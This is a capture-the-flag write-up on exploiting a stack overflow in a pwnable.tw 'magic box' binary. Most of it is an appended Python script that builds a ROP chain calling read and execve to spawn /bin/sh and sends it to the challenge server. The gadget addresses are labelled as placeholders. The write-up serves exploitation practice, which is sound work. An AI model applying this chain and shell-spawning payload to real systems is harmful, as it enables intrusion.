This is a magic box.
nc pwning.pwnable.tw 56746
This program lets us put "items" (16 bytes of arbitrary user input each) into the "box", a buffer located on the stack. However, it neither limits the number of items nor has a stack canary, so we can overwrite the saved return address and inject a ROP chain. Moreover, the binary is statically linked, so we can easily collect enough ROP gadgets from the binary itself.
I use ROPgadget to find the gadgets I need. Then I craft a ROP chain that reads /bin/sh into a free (unused, writable) buffer in the .bss section and passes that buffer as the argument of sys_execve to spawn a shell.
```python
from pwnlib.tubes.remote import remote  # pwntools TCP client
r = remote("pwning.pwnable.tw", 56746)  # connect to the challenge service (host and port from above)
```
At first, I set free_buf = 0xffffd000 because I assumed it was unused stack memory. However, I got the following error:
set_thread_area failed when setting up thread-local storage
I think this is due to ASLR, which makes the stack address different every time. The address 0xffffd000 is only valid in gdb and is generally unallocated. The .got section may be a better choice for the free buffer.
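As an added worked example (not code from the original write-up), here is a pure-Python builder for the chain described above, read(0, buf, 8) followed by execve(buf, NULL, NULL) via int 0x80, together with a check that the chosen buffer address lies inside a writable PT_LOAD segment of the binary, i.e. an address that is mapped at the same place on every run, which is exactly the property the guessed stack address 0xffffd000 lacks. The gadget addresses, the .bss address FREE_BUF, the offset RET_OFFSET from the box to the saved return address, the PT_LOAD table and the send/receive interaction are all assumptions to be replaced with ROPgadget and readelf output for the real binary.

```python
import struct

# All addresses below are hypothetical placeholders (the original write-up does
# not list them); replace them with ROPgadget / readelf output for the binary.
GADGETS = {
    "pop_eax": 0x080b8106,  # pop eax ; ret
    "pop_ebx": 0x080481c9,  # pop ebx ; ret
    "pop_ecx": 0x080de955,  # pop ecx ; ret
    "pop_edx": 0x0806f02a,  # pop edx ; ret
    "int80":   0x0806d9a5,  # int 0x80 ; ret
}
FREE_BUF = 0x080eb000   # unused, writable address in .bss (hypothetical)
RET_OFFSET = 64         # bytes from the start of the box to the saved EIP (hypothetical)
ITEM_SIZE = 16          # each "item" is 16 bytes of user input
SYS_READ, SYS_EXECVE = 3, 11   # i386 syscall numbers

# Constructed PT_LOAD table in the shape of `readelf -lW`: (vaddr, memsz, flags).
SEGMENTS = [
    (0x08048000, 0x0a0000, "R E"),   # text
    (0x080e9000, 0x003000, "RW "),   # data + bss
]


def p32(value):
    """Pack a 32-bit little-endian dword, as the i386 stack expects."""
    return struct.pack("<I", value & 0xffffffff)


def syscall(g, eax, ebx, ecx, edx):
    """ROP fragment for one int 0x80: pop the four registers, then trap.
    eax is reloaded every time because the kernel overwrites it with the
    return value of the previous syscall."""
    return (p32(g["pop_eax"]) + p32(eax) + p32(g["pop_ebx"]) + p32(ebx)
            + p32(g["pop_ecx"]) + p32(ecx) + p32(g["pop_edx"]) + p32(edx)
            + p32(g["int80"]))


def build_chain(g, free_buf, cmd=b"/bin/sh\0"):
    """read(0, free_buf, len(cmd)) then execve(free_buf, NULL, NULL)."""
    chain = syscall(g, SYS_READ, 0, free_buf, len(cmd))
    chain += syscall(g, SYS_EXECVE, free_buf, 0, 0)   # never returns on success
    return chain


def build_items(chain, ret_offset, item_size=ITEM_SIZE):
    """Pad up to the saved EIP, append the chain, and cut the result into
    16-byte items as the program reads them; the trailing NUL padding lands
    beyond the chain and is never used."""
    payload = b"A" * ret_offset + chain
    payload += b"\0" * ((-len(payload)) % item_size)
    return [payload[i:i + item_size] for i in range(0, len(payload), item_size)]


def writable_fixed(addr, size, segments=SEGMENTS):
    """True iff [addr, addr+size) lies inside a writable PT_LOAD segment of the
    (non-PIE) binary. A guessed stack address fails this check under ASLR."""
    return any(flags.startswith("RW") and start <= addr and addr + size <= start + memsz
               for start, memsz, flags in segments)


if __name__ == "__main__":
    # Connect only when run as a script (pwntools required); the interaction
    # with the item menu is assumed and must be adapted to the real program.
    from pwnlib.tubes.remote import remote
    cmd = b"/bin/sh\0"
    assert writable_fixed(FREE_BUF, len(cmd)), "free buffer is not in a writable segment"
    items = build_items(build_chain(GADGETS, FREE_BUF, cmd), RET_OFFSET)
    r = remote("pwning.pwnable.tw", 56746)
    for item in items:
        r.send(item)
    # read(0, FREE_BUF, 8) only runs once the vulnerable function returns, so
    # send the string last, after the item loop can no longer consume it.
    r.send(cmd)
    r.interactive()
```

The chain deliberately reloads eax before the second int 0x80: after read() returns, eax holds the byte count, not the syscall number. Sending "/bin/sh\0" as a separate stage also keeps the NUL terminator out of the items, so the string cannot be truncated by any string-based copy on the way in.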